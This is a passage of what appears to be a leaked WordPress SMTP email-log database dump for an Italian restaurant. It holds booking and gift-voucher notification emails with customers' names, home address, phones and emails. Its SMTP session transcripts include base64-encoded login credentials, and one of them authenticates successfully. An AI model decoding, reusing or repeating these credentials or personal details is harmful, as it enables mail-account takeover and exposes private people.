12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>													<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulazioni per la vendita.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(22114,1167,'original_headers','Content-Type: text/html\r\nReply-to: Marcello Manduchi <marcello.manduchi@hotmail.it>\r\n'),(22115,1167,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 04:53:59 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22116,1168,'solution','Not found, check status column for more info.'),(22117,1168,'success','1'),(22118,1168,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22119,1168,'to_header','notifiche@ristorantesolymar.it'),(22120,1168,'reply_to_header','Marcello Manduchi <marcello.manduchi@hotmail.it>'),(22121,1168,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22122,1168,'original_to','[\"notifiche@ristorantesolymar.it\"]'),(22123,1168,'original_subject','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1141) - 25 Ottobre 2020'),(22124,1168,'original_message','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hai ricevuto il seguente ordine da Marcello Manduchi:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1141&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Ordine #1141]</a> (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To Name:</strong> <p style=\"margin: 0;\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>													<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulazioni per la vendita.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(22125,1168,'original_headers','Content-Type: text/html\r\nReply-to: Marcello Manduchi <marcello.manduchi@hotmail.it>\r\n'),(22126,1168,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n=09=09=09=09</tr>=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=\r\n<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09=09=09=09<!-- B=\r\nody -->=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"=\r\n0\" cellspacing=3D\"0\" width=3D\"600\" id=3D\"template_body\">=0A=09=09=09=09=\r\n=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"=\r\ntop\" id=3D\"body_content\" style=3D\"background-color: #fdfdfd;\">=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<!-- Content -->=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"20\" cellspacing=3D\"0\"=\r\n width=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding:=\r\n 48px 48px 32px;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09<div i=\r\nd=3D\"body_content_inner\" style=3D\'color: #737373; font-family: \"Helvetic=\r\na Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-hei=\r\nght: 150%; text-align: left;\'>=0A=0A<p style=3D\"margin: 0 0 16px;\">Hai r=\r\nicevuto il seguente ordine da Marcello Manduchi:</p>=0A=0A<h2 style=3D\'c=\r\nolor: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica,=\r\n Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-hei=\r\nght: 130%; margin: 0 0 18px; text-align: left;\'>=0A=09<a class=3D\"link\"=\r\n href=3D\"https://www.ristorantesolymar.it/wp-admin/post.php?post=3D1141&=\r\namp;action=3Dedit\" style=3D\"font-weight: normal; text-decoration: underl=\r\nine; color: #557da1;\">[Ordine #1141]</a> (25 Ottobre 2020)</h2>=0A=0A<di=\r\nv style=3D\"margin-bottom: 40px;\">=0A=09<table class=3D\"td\" cellspacing=\r\n=3D\"0\" cellpadding=3D\"6\" border=3D\"1\" style=3D\"color: #737373; border: 1=\r\npx solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Hel=\r\nvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=09<thead>=0A=\r\n=09=09=09<tr>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"colo=\r\nr: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding:=\r\n 12px; text-align: left;\">Prodotto</th>=0A=09=09=09=09<th class=3D\"td\" s=\r\ncope=3D\"col\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertica=\r\nl-align: middle; padding: 12px; text-align: left;\">Quantit=C3=A0</th>=0A=\r\n=09=09=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"color: #737373; bord=\r\ner: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align=\r\n: left;\">Prezzo</th>=0A=09=09=09</tr>=0A=09=09</thead>=0A=09=09<tbody>=\r\n=0A=09=09=09=09<tr class=3D\"order_item\">=0A=09=09<td class=3D\"td\" style=\r\n=3D\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align=\r\n: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica=\r\n, Roboto, Arial, sans-serif; word-wrap: break-word;\">=0A=09=09Buono Rega=\r\nlo (valore a scelta) (#coupon)<ul class=3D\"wc-item-meta\" style=3D\"font-s=\r\nize: small; margin: 1em 0 0; padding: 0; list-style: none;\">=0A<li style=\r\n=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-meta-lab=\r\nel\" style=3D\"float: left; margin-right: .25em; clear: both;\">To Name:</s=\r\ntrong> <p style=3D\"margin: 0;\">Filippo Saulle</p>=0A</li>=0A<li style=3D=\r\n\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-meta-label\"=\r\n style=3D\"float: left; margin-right: .25em; clear: both;\">To:</strong> <=\r\np style=3D\"margin: 0;\"><a href=3D\"mailto:Filos4@libero.it\" style=3D\"colo=\r\nr: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@lib=\r\nero.it</a></p>=0A</li>=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=\r\n=0A<strong class=3D\"wc-item-meta-label\" style=3D\"float: left; margin-rig=\r\nht: .25em; clear: both;\">From:</strong> <p style=3D\"margin: 0;\">Amalia e=\r\n Riccardo Manduchi</p>=0A</li>=0A<li style=3D\"margin: 0.5em 0 0; padding=\r\n: 0;\">=0A<strong class=3D\"wc-item-meta-label\" style=3D\"float: left; marg=\r\nin-right: .25em; clear: both;\">Message:</strong> <p style=3D\"margin: 0;\"=\r\n>Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e=\r\n delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>=0A</li>=\r\n=0A</ul>=09=09</td>=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; bo=\r\nrder: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align=\r\n: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-=\r\nserif;\">=0A=09=09=091=09=09</td>=0A=09=09<td class=3D\"td\" style=3D\"color=\r\n: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; v=\r\nertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto,=\r\n Arial, sans-serif;\">=0A=09=09=09<span class=3D\"woocommerce-Price-amount=\r\n amount\">100,00<span class=3D\"woocommerce-Price-currencySymbol\">=E2=82=\r\n=AC</span></span>=09=09</td>=0A=09</tr>=0A=09=0A=09=09</tbody>=0A=09=09<=\r\ntfoot>=0A=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"t=\r\nd\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; border: 1px soli=\r\nd #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; bord=\r\ner-top-width: 4px;\">Subtotale:</th>=0A=09=09=09=09=09=09<td class=3D\"td\"=\r\n style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: mid=\r\ndle; padding: 12px; text-align: left; border-top-width: 4px;\"><span clas=\r\ns=3D\"woocommerce-Price-amount amount\">100,00<span class=3D\"woocommerce-P=\r\nrice-currencySymbol\">=E2=82=AC</span></span></td>=0A=09=09=09=09=09</tr>=\r\n=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"t=\r\nd\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; border: 1px soli=\r\nd #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Met=\r\nodo di pagamento:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D\"col=\r\nor: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding:=\r\n 12px; text-align: left;\">PayPal</td>=0A=09=09=09=09=09</tr>=0A=09=09=09=\r\n=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"=\r\nrow\" colspan=3D\"2\" style=3D\"color: #737373; border: 1px solid #e4e4e4; v=\r\nertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>=0A=\r\n=09=09=09=09=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px=\r\n solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;=\r\n\"><span class=3D\"woocommerce-Price-amount amount\">100,00<span class=3D\"w=\r\noocommerce-Price-currencySymbol\">=E2=82=AC</span></span></td>=0A=09=09=\r\n=09=09=09</tr>=0A=09=09=09=09=09=09=09</tfoot>=0A=09</table>=0A</div>=0A=\r\n=0A=0A<table id=3D\"addresses\" cellspacing=3D\"0\" cellpadding=3D\"0\" border=\r\n=3D\"0\" style=3D\"width: 100%; vertical-align: top; margin-bottom: 40px; p=\r\nadding: 0;\">=0A=09<tr>=0A=09=09<td valign=3D\"top\" width=3D\"50%\" style=3D=\r\n\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Ari=\r\nal, sans-serif; border: 0; padding: 0;\">=0A=09=09=09<h2 style=3D\'color:=\r\n #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Robo=\r\nto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height:=\r\n 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h=\r\n2>=0A=0A=09=09=09<address class=3D\"address\" style=3D\"padding: 12px; colo=\r\nr: #737373; border: 1px solid #e4e4e4;\">=0A=09=09=09=09Marcello Manduchi=\r\n<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORL=C3=8C-CESENA=09=\r\n=09=09=09=09=09=09=09=09<br><a href=3D\"tel:3204217844\" style=3D\"color: #=\r\n557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>=\r\n=09=09=09=09=09=09=09=09=09=09=09=09=09<br>marcello.manduchi@hotmail.it=\r\n=09=09=09=09=09=09=09</address>=0A=09=09</td>=0A=09=09=09</tr>=0A</table=\r\n>=0A<p style=3D\"margin: 0 0 16px;\">Congratulazioni per la vendita.</p>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09</div>=0A=09=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09=09=09=\r\n=09</tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09=09<!-- End Content -->=0A=09=09=09=09=09=09=09=09=\r\n=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=\r\n=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Body -->=0A=\r\n=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=\r\n=09=09=09</table>=0A=09=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09=\r\n=09<tr>=0A=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=\r\n=09=09=09=09<!-- Footer -->=0A=09=09=09=09=09=09<table border=3D\"0\" cell=\r\npadding=3D\"10\" cellspacing=3D\"0\" width=3D\"600\" id=3D\"template_footer\">=\r\n=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09<td valign=3D\"top=\r\n\" style=3D\"padding: 0; border-radius: 6px;\">=0A=09=09=09=09=09=09=09=09=\r\n=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"100=\r\n%\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=\r\n=09=09<td colspan=3D\"2\" valign=3D\"middle\" id=3D\"credit\" style=3D\'border-=\r\nradius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", H=\r\nelvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%;=\r\n text-align: center; padding: 24px 0;\'>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09<p style=3D\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p=\r\n>=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=\r\n=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=\r\n=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=\r\n=09=09=09=09=09<!-- End Footer -->=0A=09=09=09=09=09</td>=0A=09=09=09=09=\r\n</tr>=0A=09=09=09</table>=0A=09=09</div>=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK id=1kWyGT-00088X-M4\r\n'),(22127,1169,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22128,1169,'success',''),(22129,1169,'from_header','Salomoni Massimo <notifiche@ristorantesolymar.it>'),(22130,1169,'to_header','teosphone@gmail.com'),(22131,1169,'reply_to_header','salomonimassimo@gmail.com'),(22132,1169,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22133,1169,'original_to','teosphone@gmail.com'),(22134,1169,'original_subject','Da sito Sol Y Mar: \"prenotazione\"'),(22135,1169,'original_message','Da: Salomoni Massimo <salomonimassimo@gmail.com>\nTelefono: 3383339984\nOggetto: prenotazione\n\nCorpo del messaggio:\nBuonasera \r\nvorrei prenotare un tavolo per due persone a pranzo domenica 01/11 alle ore 13 \r\npreferibilmente vista mare..\r\nDistinti Saluti\r\nMassimo\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(22136,1169,'original_headers','From: Salomoni Massimo <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: salomonimassimo@gmail.com\n'),(22137,1169,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 12:05:58 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22138,1170,'solution','Not found, check status column for more info.'),(22139,1170,'success','1'),(22140,1170,'from_header','Salomoni Massimo <notifiche@ristorantesolymar.it>'),(22141,1170,'to_header','teosphone@gmail.com'),(22142,1170,'reply_to_header','salomonimassimo@gmail.com'),(22143,1170,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22144,1170,'original_to','teosphone@gmail.com'),(22145,1170,'original_subject','Da sito Sol Y Mar: \"prenotazione\"'),(22146,1170,'original_message','Da: Salomoni Massimo <salomonimassimo@gmail.com>\nTelefono: 3383339984\nOggetto: prenotazione\n\nCorpo del messaggio:\nBuonasera \r\nvorrei prenotare un tavolo per due persone a pranzo domenica 01/11 alle ore 13 \r\npreferibilmente vista mare..\r\nDistinti Saluti\r\nMassimo\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(22147,1170,'original_headers','From: Salomoni Massimo <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: salomonimassimo@gmail.com\n'),(22148,1170,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 12:06:00 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress 